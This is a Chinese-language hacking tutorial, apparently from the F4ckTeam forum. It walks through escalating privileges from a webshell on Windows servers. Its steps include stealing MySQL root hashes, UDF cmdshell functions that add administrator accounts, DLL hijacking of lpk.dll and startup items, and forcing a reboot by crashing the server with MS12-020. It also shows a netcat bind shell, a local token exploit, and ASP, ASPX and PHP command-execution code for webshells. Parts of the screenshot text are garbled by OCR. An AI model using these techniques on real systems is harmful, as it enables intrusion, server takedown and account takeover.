先来说说我是咋判断一台 windows 服务器上的 mysql 有没有降权的. 0.0 如果能运行 cmd 的话,我会 先看看有啥用户先,如果有 mysql mssql 这样用户名,或者类似的.我就会猜测他的mssql 服务或者 mysql 的已经被降权运行了.但并不代表不能提权,只要能运行 cmd..

接着说一下,判断服务器上是否开启了 mysql服务. 一般在拿到 webshell 的时候,都会扫描一下端口,如果开启了 3306 端口的话,我会 telnet 过去看看--.忘了有无回显~(提权的时候,大多数 3306 端口的 都是不支持外链的.呃,我遇到的大多数是这样,有 root 可以开启外链.) 当然也有一些管理员会把 mysql 的默认端口改掉.另外一个判断的方法就是网站是否支持 php,一般支持 php 的网站都用 mysql 数据库的.php+mysql 啊,好基友啊好丽友--~ (当然,也有一些网站用其他的一些更专业的数据库).

地址 ① 🗃 http://www.h4x0er.com/passxg.php?	
192.168.239).138 - WINNT - Alexa
文件管理	目 扫描IP 127.0.0.1
批量挂马	端口号 [21]23]25[80]110]135[139]445[1433]3306[3389]43958
批量清平	
批量替找	关闭端口> 21 关闭端口> 23
扫描木马	关闭端□> 25 开放端□> 80
系统信息	关闭端□> 110 开放端□> 135
执行命令	→ 关闭端口> 139> 145
组件接口	7 版3間> 1433 美闭端口> 1433
扫描端口	→ 新約編L> 3306 美初端L> 3389
推进文	大切端口> 43958

再说说如何查找 mysql root 的密码.

MYSQL 所有设置默认都保存在"C:\Program Files\MYSQL\MYSQL Server 5.0\data\MYSQL"中,也 就是安装程序的 data 目录下,如图 2 所示,有关用户一共有三个文件即 user.frm、user.MYD 和 user.MYI, MYSQL 数据库用户密码都保存在 user.MYD 文件中,包括 root 用户和其他用户的密码。

📁 E : \ZkeysSoft\BySql\BySQ	L Server 5.0\data\mysql			<u>- 0 </u>
文件(E) 编辑(E) 查看(V)	收藏(A) 工具(T) 帮助(H)			A.
😋 后退 👻 🕤 🗸 🎓 搜索	🕞 文件夹 🛛 🕞 👧 🗙 🏹			
地址(D) P:\7keysSoft\MySal	\MwSQI Server 5 0\dets\mwsql			▼ → 转到
2 C S S S S S S S S S S S S S S S S S S	L. L. Herri			
_ · 石柳 ←		2009-1-11 17:02		
m nost. mii	1 10 11 12 17	2000-1-11 11.23	ж ,	
The proce HVD	ICKD FMM 及开 CKB WYD 並供	2009-1-11 17:23	۲ ۸	
		2000 1 11 17:23	л ,	
m proc. mir fra	o KB KBM 立保	2008-1-11 17:23	۸ ۸	
m proce priv. MYD	0 KB MVD 文件	2008-1-11 17:23	۸ ۵	
m proce priv MYI	3 KB MYT 文件	2008-1-11 17:23	4	
d tables priz frm	9 KB FRM 文件	2008-1-11 17:23	4	
tables priv MYD	окв мүр 文件	2008-1-11 17:23	4	
tables priv. MYI	1 KB MYI 文件	2008-1-11 17:23	A	
time zone. frm	9 KB FRM 文件	2008-1-11 17:23	A	
time zone. MYD	OKB MYD 文件	2008-1-11 17:23	A	
🖬 time zone. MYI	1 KB MYI 文件	2008-1-11 17:23	A	
time zone leap second frm	9 KB FRM 文件	2008-1-11 17:23	A	
📷 time zone leap second. MYD	OKB MYD 文件	2008-1-11 17:23	A	
📷 time_zone_leap_second. MYI	1 KB MYI 文件	2008-1-11 17:23	A	
time_zone_name. frm	9 KB FRM 文件	2008-1-11 17:23	A	
📷 time_zone_name. MYD	O KB MYD 文件	2008-1-11 17:23	A	
📷 time_zone_name. MYI	1 KB MYI 文件	2008-1-11 17:23	A	
📷 time_zone_transition. frm	9 KB FRM 文件	2008-1-11 17:23	A	
📷 time_zone_transition. MYD	OKB MYD 文件	2008-1-11 17:23	A	
📷 time_zone_transition. MYI	1 KB MYI 文件	2008-1-11 17:23	A	
🖬 time_zone_transition_ty	9 KB FRM 文件	2008-1-11 17:23	A	
📷 time_zone_transition_ty	OKB MYD 文件	2008-1-11 17:23	A	
📷 time_zone_transition_ty	1 KB MYI 文件	2008-1-11 17:23	A	
🖬 user. frm	11 KB FRM 文件	2008-1-11 17:23	A	
📷 user. MYD	1 KB MYD 文件	2008-1-11 17:23	A	
👼 user. MYI	2 KB MYI 文件	2008-1-11 17:23	A	E

User.frm user.myd User.myi

这几个文件.在 webshell 下,下载下来,解密.用 c32asm 或者其他的一些文本编辑器 user.MYD 打开.



A30F80616A023BDFC9

复制到 cmd5.com 那查一下,或者用 cain 爆破一下. 打开后使用二进制模式进行查看,如图所示,可以看到在 root 用户后面是一串字符串,选中这些字 符串将其复制到记事本中,这些字符串即为用户加密值,即 A30F80616A023BDFC9 。 具体使用 cain 破解的,我这就不演示了.参考一下 http://www.bitscn.com/network/hack/200910/177235.html

还有一个查找的方法就是,一些php网站安装的时候用的是root用户,例如dedecms,他数据库安装的信息就是写在 data/common.inc.php



?

Discuz 的数据库信息就在 config/config_global_default.php

💽 config_global_default.php - 卍争本 文件 (F) 编辑 (E) 格式 (Q) 查看 (V) 帮助 (H) <?php /** [Discuz!] (C)2001-2099 Comsenz Inc. × This is NOT a freeware, use is subject to license terms × × \$Id: config_global_default.php 29404 2012-04-11 02:21:21Z cnteacher \$ × ***/** \$_config = array(); 11 ------- CONFIG DB --------- // // // │ ★ 数据库主服务器设置,支持多组服务器设置,当设置多组服务器时,则会根据分布式 策略使用某个服务器 * @example * \$_config['db']['1']['dbhost'] = 'localhost'; // 服务器地址 * \$_config['db']['1']['dbuser'] = 'root'; // 用户 * \$_config['db']['1']['dbpw'] = 'zkeys';// 密码 * \$_config['db']['1']['dbcharset'] = 'gbk';// 字符集 * \$_config['db']['1']['pconnect'] = '0';// 是否持续连接 * \$_config['db']['1']['dbname'] = 'x1';// 数据库 * \$_config['db']['1']['tablepre'] = 'pre_';// 表名前缀 * \$_config['db']['2']['dbhost'] = 'localhost'; × */

0x02 手工提权,自动提权

我们找到了 mysql 的 root 账号密码,先记录下来.账号:root,密码:zkeys 第一步,我们先在 php webshell 下点击 mysql 执行.输入账号 root,密码 zkeys 库名 mysql(mysql 这个

库是默认安装 mysql 服务的时候就存在的了,还有 test. Mysql 库里存的是 mysql 的账号密码 和其他 的一些设置.)

文件管理	[MYSQL执行语句] [MYSQL上传文件] [MYSQL下载文件]								
批量挂马	地址 localhost	端口 3306	用户 root	密码 zkeys	库名 mysql				
批量清马	select version(D:		_					
批量替换		_ २ _			<u> </u>				
扫描木马									
系统信息									
执行命令									
组件接口					~				
扫描端口			显示版本 マ 执行	1					
搜索文件			执行SQL语句成功	4					
Linux提权			5.0.51b-community-r						
ServU提权									
MYSQL提权	_								
MYSQL执行									
MYSQL管理									
退出系统									
		M	1icrosoft-IIS/6.0						

版本 5.0.51b-community-nt

这里说一下,UDF 提权,5.0 版本以下(包括 5.0 的)放到系统目录就可以利用.

在 mysql 5.1 以上的版本为了以防黑客利用,更改了,不能导出到系统目录下创建自定义函数。 只能导出在 mysql 安装目录下的 lib/plugin 目录中。

这里我先演示一下 5.0 的手工提权吧.等会自动提权我用 5.1 的来演示.

这里用到 langouster 写的 udf 提权工具.我们填写账号密码和库名然后点击提交.就登陆了.

参langouster_udf. dll 专用网马 - ■icrosoft Internet Explorer	
文件 (E) 编辑 (E) 查看 (Y) 收藏 (A) 工具 (E) 帮助 (H)	
🔾 后退 🔹 🕥 👻 😰 🏠 🔎 搜索 🦙 收藏夹 🤗 🔝 🔜	
地址 @) 🙋 http://www.h4xOer.com/udf.php	- >
host:	
mysql账号: root	
密码: zkeys	
数据库名: mysql	
提交重填	

第一步导出 udf。

这个 udf 我自己改了一下。。

地址 @) 🗃 http://www.h4xOer.com/udf.php?action=buildDLL&	💌 芝 转到	链报
MYSQL连结成功		
DLL导出路径: <mark>注意:</mark> MYSQL 5.0以上版本请使用系统目录! C:/WINDOWS/udf.dll		
DLL己成功的导出到C:/WINDOWS/udf.dll		
SQL命令: Create Function cmdshell returns string soname 'udf.dll'	执行	
第二步创建 cmdshell 功能函数		
3QL命令:		
Create Function cmdshell returns string soname 'udf.dll'	执行	
回显结果: 		

Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的 DLL 路径';

Create Function cmdshell returns string soname 'udf.dll';

功能函数说明: cmdshell 执行 cmd; downloader 下载者,到网上下载指定文件并保存到指定目录; open3389 通用开 3389 终端服务,可指定端口(不改端口无需重启); backshell 反弹 Shell; Process View 枚举系统进程; KillProcess 终止指定进程; regread 读注册表; regwrite 写注册表; shut 关机,注销,重启; about 说明与帮助函数;

执行

第三步 执行 cmd 命令

SQL命令:

select cmdshell('net user');

回显结果:

cmdshell('net user')
完成!

select cmdshell('net user');

执行后没显示账号的话,就说明变量或者 net 设置了权限.我们手工传一个 net.exe

地址 (D) 🗁 <u>C: \RECYCLER</u>				
名称 ▲	大小	类型	修改日期	属性
🥑 S-1-5-21-3510027907-915		文件夹	2012-6-22 22:17	НS
net. exe	42 KB	应用程序	2012-5-28 17:47	A
1				

传到 C 盘回收站那目录了.

<pre>select cmdshell('C:\\RECYCLER\\net user');</pre>	执行	_
回显结果:		
cmdshell('C:\\RECYCLER\\net user')		
\\ 的用户帐户		
Administrator ASPNET IUSR_MIXOXRN-A42FD62 IWAM_MIXOXRN-A42FD62 命令运行完毕,但发生一个或多个错误。	Guest SUPPORT_388945a0	
完成 完成		-

select cmdshell('C:\\RECYCLER\\net user'); 看到了吧.显示了~再传一个 whoami.看看权限.

地址 ①) 🍘 http://www.h4xOer.com/udf.php?action=SQL&	🗾 🔁 转到
<pre>select cmdshell('C:\RECYCLER\whoami');</pre>	执行
回显结果:	
cmdshell('C:\\RECYCLER\\whoami')	
nt authority\system	
完成!	
System 权限. 地址 ① ● http://www.h4xOer.com/udf.php?action=SQL&	✓ → 转到 链接
501 44.	
SQLHD マ: select cmdshell('C:\\RECYCLER\\net user xiaoguai www.h4x0er.c 执行	
回显结果:	
cmdshell('C:\\RECYCLER\\net user xiaoguai www.h4x0er.com /add & c:\\RECYCLER\\net localgr xiaoguai /add')	oup administrators
命令成功完成。	
完成	

select cmdshell('C:\\RECYCLER\\net user xiaoguai www.h4x0er.com/add & c:\\RECYCLER\\net localgroup administrators xiaoguai /add');

最后我们来看看 xiaoguai 这个账号创建了没
	SQL命令: select cmdshell('C:\\RECYCLER\\net user xiaoguai'); 执行			
	回显结果:			
	帐户启用 帐户到期	Yes 从不		
	上次设置密码 密码到期 密码可更改 需要密码 用户可以更改密码	2012-6-22 22:38 2012-8-4 21:25 2012-6-22 22:38 Yes Yes		
	允许的工作站 登录脚本 用户配置文件 主日录 =	A11		
l	上次登录 	从小		
	本地组成员 全局组成员 命令成功完成。	*Administrators *None	*Users	

select cmdshell('C:\\RECYCLER\\net user xiaoguai'); 好了,添加上去了.

接着演示自动提权,

1	2 目 1001、ロシルビス、 地址 ① 資 http://www.h4x0er.com/moon.php		🗾 ラ 转到 链接
	基友菊	花爆必备神器−>TYSQL高版本提权工具	
	host:		
	name:	root	
	pass:	root	
	dbname:	mysql	
		提交重置	
	Co	pyright By Dark'mOon 2011	
	Blog: <u>www.mo</u>	onhack.org Bbs:www.90sec.org 版本引	更新

点击提交,

地址 ①) @ http://www.h4xOer.com/moon.php?action=dll
当前路径:E:\www.oot\
浏览 上传文件
路径目录为
C:/Program Files/MySQL/MySQL Server 5.1/1 导出udf
导出成功
义许路径:
目标路径: C:/WINDOWS/diy.dll
白定义导出
I
登陆后,导出 udf.成功的话他会提示.
第一步创建 cmdshell

创建cmdshell 提交	
自定义SQL语句:	
A	
▶ 执行	
回显结果:	
SQL语句:create function cmdshell returns string soname 'moonudf.dll'	

点击提交

第二步添加超级管理员

自带命令:	
添加超级管理员 💌	提交
创建cmdshell	

添加超级管理员	
査看用户	
查看端口	<u></u>
查看创建函数	
删除cmdshell	
创建反弹函数	
执行反弹	
删除backshell	↓ 执行

回显结果:

SQL语句:select cmdshell('net 123456 /add & net localgroup \$darkmoon /add') 命令成功完成。	user \$darkmoon administrators	4
	完,	成!

完工,创建账号\$darckmoon 密码 123456 的管理员账号.

: el de	C:\Documents and Settings\Administrator>net user \MIX0XRN-A42FD62 的用户帐户			
5) 	\$darkmoon IUSR_MIXØXRN-A42FD62 命令成功完成。 C:\Documents and Setting	Administrator IVAM_MIXØXRN-A42FD62 s\Administrator>	Guest SUPPORT_388945aØ	-

T

0x03 启动项提权,DLL 劫持提权

l	地址 ① @ http://www.h4xOer.com/mysqltk.php	_ → 转到 链
	T YSQL Bao Ju Token Tools	
	host:	
	pass: [root	
	dbname: mysql 提交 重置	
	Copyright By ∐ix0xrn 2012 Blog:www.h4x0er.com BBs: <u>http://team.f4ck.net</u> 版	<u>本更新</u>

地址 (1) (個) トナナロン //www. bdy/Dexcom/myraltkphp?eation=coppect
当前路谷:E:\www.oot\
浏览 上传文件
略任日本 /\ C:/Documents and Settings/Administrator/ 导出bat
路径目录为 C:/Program Files/MySQL/MySQL Server 5.1/b _ 导出dll
导出 bat,就是把 bat 写进启动项去,导出 dll 就是劫持 mysql 安装目录下的 bin 的 mysqld. 地址 @
数据库mysql存在 <u>点击退出</u>
当前路径:E:\www.root\
路径目录为 C:/Documents and Settings/Administrator/ _ 导出bat
路径目录为 C:/Program Files/MySQL/MySQL Server 5.1/bin/lpk.dll 导出dll

导出成功

文件路径:		
目标路径:	C:/WINDOWS/diy.	d11
		自定义导出

导出完毕后,我们利用其他的一些方法让服务器重启(ddos,蓝屏溢出漏洞啊,社工管理员让他重启).或者就干等吧.

这里我用 ms12020 来溢出这台服务器,让他重启.达到我们提权的目的

A problem to your o If this i restart y these ste	i has been detected and wir computer. is the first time you've se your computer. If this scre aps:	dows has been shur D:∨ en this Stop erroi en appears again, D:∨ Cmd	√)乖渗透测试工具包\tools\提权\exp\windows\ms12020>nc 192.168.23 ht √)乖渗透测试工具包\tools\提权\exp\windows\ms12020>nc ↓ line: wrong: unknown socket error
Check to identifie adapters. Check wit BIOS memo to use Sa computer, select Sa Technical *** STOP: Beginning Dumping p	be sure you have adequate ed in the Stop message, dis manufacturer for driver up th your hardware vendor for ory options such as caching fe Mode to remove or disat press F8 to select Advance the Mode. information: cox0000008E (Oxc0000005,0x armdd.sys - Address F763888 g dump of physical memory shysical memory to disk: 5	disk space. If a able the driver of dates. Try changi any BIOS updates or shadowing. If le components, re sed startup option the components, re sed startup option the components the components t	小乖渗透测试工具包、tools、提权 \exp\windows \ms12828>nc 192.168.23' tt 小乖渗透测试工具包、tools、提权 \exp\windows \ms12828>nc 192.168.23' tt 小乖渗透测试工具包、tools、提权 \exp\windows \ms12828>nc 192.168.23' tt
To direct inp	out to this VM, click inside or press (Ctrl+G.	😪 🛶 💾 ங 🦚 🖶 🔟
	名称	修改日期	 类型
	🔍 cmd cmd	2012/6/8 14:00	Windows
	nc.exe	2012/1/2 18:46	应用程序
间的位置	poc.dat	2012/3/16 14:59	DAT 文件
UPHUIZE	↓ □ 使用方法.txt	2012/6/16 9:34	文本文档
V视库			🔍 💽 🐖 🦐 😑 💷

服务器蓝屏了,等他重启,我们的 lpk 和启动项的 bat 就会运行了.

☆王郎: ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●			
Microsoft Windows [版 <c>版权所有 1985-200</c>	本 5.2.3790] 3 Microsoft Corp.		_
回收 C:\Documents and Sett	ings\Administrator>net (lser	
>>MIXØXRN-A42FD62 的月	用户帐户 		
mysql-5 Administrator	Guest	IUSR_MIX0XRN-A42FD62	
1WAM_M1X0XRN-A42FD62 命令成功完成。 《	SUPPORT_388945a0	xiaoguai	
xingwai C: Documents and Sett	ings Administrator>_		
*			
2345\$			
TOOls Sethc			•
1. nta			
27 开始 📔 🍠 🚱 🔢 📃 LPK SETH	C 2.0 🛛 🔤 命令提示符		🛛 🕅 🛱 🗞 🚾
그성신과관과フ			

已经创建成功了。

0x04 mysql 降权提权

最后我们来演示一下 mysql 降权的 udf 提权方法.

T00LS Lpk Sethc v3.0 [正式完	结版]
Sethc 启动设置 ● 2键启动 健1: 16 键2: 88 键3: 启动密码: * 加密次数: 10 0<次数≤100	LPK辅助提权设置 ✓ 执行CMD CMD路径: C:\RECYCLER\cmd.exe 命令: ▷:\RECYCLER\nc -1 -p
生成设置 ■使用UPX压缩体积(推荐) 生成	U: P: 组: adminis 《关闭Windows文件保护
祝我生日快乐!感谢一路上的 你们!! 版本:3.0 作者:Rices Forum:T	□隐藏运行 □重复下载 00Ls.Net [4 Fucker Te@m]

生成一个 udf.dll 文件(把 nc 和 cmd 传到一个可写的目录去) Cmd 路径

C:\RECYCLER\cmd.exe

命令:

 $C:\ \ C:\ \ C:\$

然后用我改的 php mysql 提权的, 先把 dll 文件传到网站目录下,再传到 mysql 安装的 bin 目录下.文件 名 lpk.dll

地址 @) 🎒 http://www.h4xOer.com/mysql.php?action=connect
当前路径:E:\www.oot\
上传成功,路径为E:\www.root\test.dll
路径目录为
C:/Documents and Settings/Administrator/ 导出bat
路径目录为
E:/ZkeysSoft/MYSQL/MySQL Server 5.0/bin/1 导出dll
文件路径: E:\www.root\test.dll
目标路径: MySQL Server 5.0/bin/lpk.dll 自定义导出

导出以后我们等服务器重启,之后 telnet 服务器 ip 110



Telnet 过去了.获得一个 cmdshell.我们在那目录下传提权 exploit 吧.

Telnet 192.168.239.138	
C:\WINDOWS\system32>cd_C:\RECYCLER	<u>^</u>
cu C. WEGIGLER	=
C:\RECYCLER> C:\RECYCLER>net	
net 此命令的语法是 :	
NET [ACCOUNTS COMPUTER CONFIG CONTINUE FILE GROUP HELP HELPMSG LOCALGROUP NAME PAUSE PRINT SEND SESSION SHARE START STATISTICS STOP TIME USE USER VIEW]	
C:\RECYCLER> C'不是内部或外部命令,也不是可运行的程序 或批处理文件。	
C:\RECYCLER>	
C:\RECYCLER>ms11046.exe ms11046.exe	
[>] ms11-046 Exploit	
[>] by:Mer4en7y@90sec.org [*] Token system command	
[*] command add user 90sec	
[*] User has been successfully added	-

Cd C:\RECYCLER ///切换到 exploit 目录 ms11046.exe ///运行 ms11046 exploit 创建账号 90sec 密码 90sec 成功.

第7节 ASP 环境下的 Shell. application

作者:杨凡 邮箱:fan@f4ck.net 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

前言:我不懂脚本开发,帖子里的话都是我查资料然后猜的,如果不对,望各位及时指正。

众所周知, wscript.shell 可以被用来调用执行 exe 等可执行文件, 所以很多管理员都把 wscript.shell 组件卸载掉了。

但是,wscript.shell 被卸载掉我们就没办法执行 DOS 命令了吗?答案当然是否定的。不说服务器支持多种脚本解析的情况,就单说服务器只支持 asp,那也是可以执行 DOS 的。

那么,到底用什么执行呢?

答案就是 Shell.application 组件。

Shell.application 组件可以替代 wscript.shell 被攻击者用来调用执行可执行程序。

再来看个 webshell 探测到的组件支持信息的图:

Scripting.FileSystemObject :文件操作组件,具备罗列和管理服务器中文件和文件夹的能力	开启
wscript.shell :命令行执行组件,允许ASP运行.exe等可执行文件此组件也会被用来运行提升权限的程序	开启
ADOX.Catalog :ACCESS建库组件	开启
JRO. JetEngine :ACCESS压缩组件	开启
Scripting.Dictionary :数据流上传辅助组件	开启
Adodb. connection :数据库连接组件	开启
Adodb.Stream :数据流上传组件,常常被用来上传术马等不安全程序,从而扩大攻击者的破坏能力	开启
SoftArtisans.FileUp :SA-FileUp 文件上传组件	开启
LyfUpload.UploadFile :刘云峰文件上传组件	开启
Persits.Vpload.1 :ASPUpload 文件上传组件	开启
JMail.SmtpMail :JMail 邮件收发组件	开启
CDONTS. NewMail :虚拟SMTP发信组件	开启
SmtpMail.SmtpMail.1 :SmtpMail发信组件 // / / / / / / / / / / / / / / / / /	开启
Microsoft.XMLHTTP:数据传输组件,常在采集系统中用到	开启
Shell. application :Shell 組件,可能涉及安全问题	計用

在上图中可以看到 Shell.application 组件。

同样的,在注册表中的HKEY_CLASSES_ROOT 路径下也可以看到这个组件:



如上图,可以看到,在 Shell.application 组件下边,有一个名为 Shell.application.1 的组件,这个组件 是 Shell.application 组件的备用组件,相当于双机热备,2个效果都是一样的,同样的 wscript.shell 也是有备用组件的:



这也算是微软自带的一个后门,当我们实际中遇到 wscript.shell 和 Shell.application 都被卸载的时候,可以尝试他们的备用组件。

基本介绍完了,下面是 asp 环境下如何调用这个组件。

代码是 lcx 写的, vbs 调用 Shell.application 执行可执行程序的 5 种方法: Set objShellApp = CreateObject("Shell.Application") Set objFolder = objShellApp.NameSpace("c:/") objFolder.Items().item("demo.exe").invokeverb '方法 1

objFolder.Items().item("demo.exe").InvokeVerbEx'方法 2 objShellApp.Open("C:/demo.exe") '方法 3 objShellApp.ShellExecute "demo.exe","","c:/","","1" '方法 4,可以加参数和设置参数值 '方法 5 Set objFolderItem = objShellApp.NameSpace("C:/").Items().item("demo.exe") Set objFIVs = objFolderItem.Verbs() For i=0 To objFIVs.Count - 1 'MsgBox objFIVs.Item(i) Set objFIV.s.Item(i) If objFIV.Name = "打开(&O)" Then '右键菜单中在中文系统是"打开(&O)", 英文自己改 objFIV.DoIt Exit For End IF Next 另外, 听说用 Shell.application 执行 DOS 命令的话,是不会有回显的,这样的话,就需要把命令输

现在很多的 webshell 都有这样的提示:

出到一个文本中,然后再读出来,麻烦一点。

		服务器组件信息	
服务器名		localhost	
服务器IP		127.0.0.1 查询此服务器所在地	
服务器Alexa排名		localhost:81 排名:	查询
服务器时间		2012-6-27 18:15:43	
服务器CPU数量			
服务器操作系统			
WEB服务器版本		NetBox Version 2.8 Build 4128	
Scripting.FileSystemObject	4	文件操作组件	
wscript.shell	4	命令行执行组件,显示'×'时用 执行Cmd二 此功能执行	
ADOX.Catalog	$\overline{\mathbf{A}}$	ACCESS 建库组件 (() Lg CUU	
JRO. JetEngine	~	ACCESS 压缩组件	
Scripting. Dictionary	1	数据流上传辅助组件 245000000000000000000000000000000000000	

看看这个提示的执行 cmd 二:

+>査看硬盘↓↓↓↓		cmd. exe
●程序目录		
●站点目录		**执行**
●上級目录		
●新建目录		
●新建文本		
●上传文件		
●执行_CMD	E	
●执行CMD2	隐囊	
+ + 提权相天 + +	題	
●用户账号	4	
●终端登录		
●组件支持		
●查询管理		
●打包解包		L Security Team

这里我不知道他是用的 wscript.shell.1 还是用的 Shell.application 执行的 DOS,但是我尝试了好多带 这个功能的 webshell 的这个"执行 cmd 二"的功能,但没有一个能用的,没办法,就自己找了点资料 写了一个测试脚本。

🥙 调用Sh	ell. Appli	cation执	፹DOS ቆ ኆ	≻ – ∎ier	osoft In	ternet	Explorer	
文件 (2)	编辑(2)	查看(V)	收藏(<u>A</u>)	工具(T)	帮助(H)			
🔇 后退	• 🕘 •	💌 💈		🔎 搜索	숬 收藏:	ж 🧭		ļ
地址 (12) 🤞	🖣 http://1	localhost:8	31/x. asp					
可执行: 可执行: 可执行: submit	文件所在 文件的文 文件的参	目录: [件名: [读数: □		1	C ¹ 4 Seci	CK Irity	Tear	И

上图是界面,要填写的东西界面上写的很清楚了,我现在要用 Shell.application 执行 C:\netbox\wwwroot 目录下的 x.bat 这个批处理,而这个批处理的代码是:

 $echo F4ckTeam > C: \\ www.root \\ F4ckTeam.txt$

也就是输出一个字符串。

填一下参数:

🖉 调用Shell. Appl	ication执行DOS命令 - ∎icrosoft Internet Explorer
文件 (E) 编辑 (E)	查看(V) 收藏(A) 工具(T) 帮助(H)
Ġ 后退 🔹 💮 🚽	🛃 🐔 🔎 搜索 🥎 收藏夹 🧭 😒 - 🌺
地址 @) 🛃 http://	localhost:81/x. asp
可执行文件所在 可执行文件的文 可执行文件的参 <u>submit</u> 点 submit 执行:	E目录: C:\netbox\wwwroot C件名: x.bat 多数:
C:\netbox\wwwrd	
, ‡和文件夹任务	▲ ■ code. asp ☆ cmd. asp ☆ 体 g) にmd. asp
重命名这个文件 移动这个文件 复制这个文件 将这个文件发布到 ^{Web} 以电子邮件形式发送 此文件	F4ckTeam. txt
测试成功。	

那么在实际渗透测试中如何使用这个组件执行命令呢?

我们可以传个 bat 上去,因为这个组件实现执行 DOS 回显比较麻烦,我也不会,所以我们传上去的 bat 里需要有重定向命令,也就是把命令执行结果重定向到某个目录,然后自己去那个目录看输出的 内容即可。

第8节 ASPX 环境下的 DOS 命令执行

作者:杨凡 邮箱:fan@f4ck.net 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

前边 2 贴基本上把 asp 环境下的命令执行问题说清楚了,这一贴来说 aspx 环境。

前边说到, asp 环境下, 如果 ws 组件被删,可以尝试使用 shell.application 组件来执行, 如果这 2 个 组件都被删,可以尝试使用它们的备用组件来执行。

其实除了这些思路,还是有办法的,那就是对服务器进行一个脚本探测,看看服务器都支持什么脚本,现在一般的大马都带有这个功能的:

地址: C:\netbox	(/wwwro	ot\.
(1) [Program] (2) [P [RECYCLER(d:\)] (10 (1) [wmpub] (2) [T [pcAnywhere] (10	rogramI) 【RECN EMP】) 【Allu	D】(3)【ProgramE】(4)【Documents】(5)【All_Users】 (CLER(e:\)】 (3)【ServU(1)】(4)【ServU(2)】(5)【WINDOWS】 user桌面】
●l狭i注im表		
●Serv0 ●Su-FTP版 ●MS SOI		■1.asp [Edit Del Copy Move] - 97K ASP 文件 - 2011-9-30 12:01:40
●R_Admin ●PcAny_WH		[Edit Del Copy Move] - 97K ASP 文件 - 2011-9-30 11:59:21
●名字搜索		
●PHP_侦探 ●ASPX侦探 ●JSP_侦探	臣之	E code. asp [Edit Del Copy Move] - 111K ASP 文件 - 2017年30 日 58726
●查看磁盘	BBS	ASP XFF - 2012-1-22-1910-251149 11-00-11

探测之后就能很方便的知道服务器都支持什么脚本。

如果服务器支持 aspx, 那执行 dos 命令一般无压力, 如果支持 php, 执行 dos 命令得看相关函数是否 被禁用, 如果支持 jsp, 那你发达了, jsp 一般都是 system 权限, 提权都省了。

这个贴暂时不讨论 php 环境的情况,只简单说说 aspx 下的情况。

Aspx 下一般使用 process 类来调用执行可执行程序, process 类的介绍在这里:

http://msdn.microsoft.com/zh-cn/ ... ostics.process.aspx

给一段简单的代码:

using System.Diagnostics; //添加引用

Process process = new Process(); //声明一个名为 process 的 Process 实例

process.StartInfo.FileName = "c:\\windows\\notepad.exe"; //设置 process 的属性,文件名必须加后缀 process.Start();//启动程序

一般情况下,没人会去对.net 的类库下手(可以禁用/删除某个类吗?没听说过可以),最多最多,是 设置下应用程序池或.net user 以及 IIS User 的权限,所以 aspx 执行命令一般都是没问题的,但是现 在的很多主机管理系统,比如星外,对 cmd.exe、net.exe 等文件的权限卡的很死,这个时候想调用 系统自带的 cmd.exe、net.exe 等文件很困难,自己传一个就行了。

另外,执行命令的时候,自己上传的 cmd.exe 所在路径最好不要带空格,否则会执行错误。另外, 有时候也可以直接将要执行的 exe 程序路径写到 cmd.exe 的路径上,然后在原本要填具体命令的地 方写上将要执行的 exe 程序的参数,这也是可以的。

比如原本是这样的:

执行CmdShell

CMD:	cmd.exe	Ŧ	74	CK.	UR
命令:	pr.exe "net user"		iecl	irity	Team

而我现在这样也是可以的:

执行CmdShell

					G_{1}	0	_
CMD:	pr.exe				, UL	2	
		_				0	
命令:	"net user"		EEL	Irit,		Palm	

另外,很多语言都是支持 API 的,同样的, aspx 也是支持 windows 的 API 的,所以在 aspx 中除了 可以使用 process 类来调用可执行程序之外,还可以使用 api 来实现。

using System.Runtime.InteropServices; //添加引用

[DllImport("shell32.dll")] //引入 dll

private static extern IntPtr ShellExecute(IntPtr hwnd, string lpOperation, string lpFile, string lpParameters, string lpDirectory, Int32 nShowCmd); //声明函数

ShellExecute(IntPtr.Zero, "open", "c:\\windows\\notepad.exe", null, null, 1); //执行, 文件名可以不加后 缀

不过,因为.net 下调用 api 挺麻烦的,所以大多数人都不会用这种方法,毕竟.net 的类库很强大,大 多数的操作都不需要调用 api 来实现。

最后,是我从 aspxspy 里摘出来的执行 cmd 的完整代码:

文件 (E) 编辑 (E) 查看 (V) 收藏 (A) 工具 (E) 帮助 (H) ③ 后退 • ③ • ▲ 2 《 》 ▶ 搜索 ☆ 收藏夹 ⊗ ◎ ▶ ॆ > 地址 (D) ④ http://localhost/f4.aspx 执行CmdShell	
 ③ 后退 • ③ • ▲ 2 ☆ 2 按索 ☆ 收藏夹 谷 2 ◆ 3 2 地址 ④ ④ http://localhost/f4.aspx 执行CmdShell 	
地址 @) http://localhost/f4.aspx 执行CmdShell	
执行CmdShell	
(TMD) Junit aut	
CIMD: Icma.exe	
命令: echo F4ckTeam	
回显:	K Cr

第9节 PHP 环境下的 DOS 命令执行

作者:杨凡 邮箱:fan@f4ck.net 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

0x00 安全模式 0x01 可利用的函数 0x02 禁用危险函数

0x00 安全模式

说到 php 下执行 DOS 命令,就不得不提 php 的安全模式。

安全模式是 php.ini 里的一个参数名,这个参数是: safe_mode,这个参数是个 bool 型参数,它的值 有 2 个,分别是 on 和 off。

📕 php. ini-development - 记事本 文件(F) 编辑(E) 格式(0) 查看(V) 帮助(H) ; Production Value: Off (Issue warnings) ; http://php.net/allow-call-time-pass-reference allow_call_time_pass_reference = Off ; Safe Mode <u>: http://php.net/s</u>afe-mode safe mode = Off ; By default, Safe Mode does a UID compare check when ; opening files. If you want to relax this to a GID compare, ; then turn on safe_mode qid. ; http://php.net/safe-mode-gid safe mode gid = Off ; When safe_mode is on, UID/GID checks are bypassed when ; including files from this directory and its subdirectories. ; (directory must also be in include path or full path must ; be used when including) ; http://php.net/safe-mode-include-dir safe_mode_include_dir =

默认情况下,这个值是 off。

当 safe_mode=on 时, php 运行在安全模式下,在安全模式下,很多 php 函数会受到限制,比如我们 执行 DOS 命令所需要的 system()函数、exec()函数等等,关于安全模式下有哪些函数被限制,请看: http://www.php.net/manual/zh/features.safe-mode.functions.php

当 safe_mode=off 时, php 运行在非安全模式下,也就是普通模式,所有的 php 函数不会受到限制, 一般情况下,只有在非安全模式下,DOS 命令才能在 php 脚本中被成功执行,可以说,要想在 php 的 webshell 中执行 DOS 命令, safe_mode=off 是一个必需条件。

